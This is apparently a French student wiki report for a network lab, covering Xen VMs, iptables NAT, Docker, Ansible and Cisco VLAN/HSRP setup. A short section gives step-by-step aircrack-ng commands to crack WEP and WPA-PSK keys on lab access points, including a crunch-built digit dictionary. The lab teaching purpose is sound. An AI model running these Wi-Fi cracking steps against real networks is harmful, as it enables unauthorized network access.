Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 all:                                        # le groupe de machine racine c'est à dire tout&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:                                   # groupe d'hôtes contenant seulement notre VM privée&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:                               # groupe d'hôtes contenant toutes les VMs privées (la ferme de serveurs Web)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
  ntp-client:                                # groupe cible pour le déploiement de clients ntp (notre VM privée)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.2&lt;br /&gt;
  ntp-server:                                # groupe cible pour le déploiement de serveurs ntp (notre VM Publique)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.12&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52027</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52027"/>
				<updated>2020-01-05T16:49:30Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Hosts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
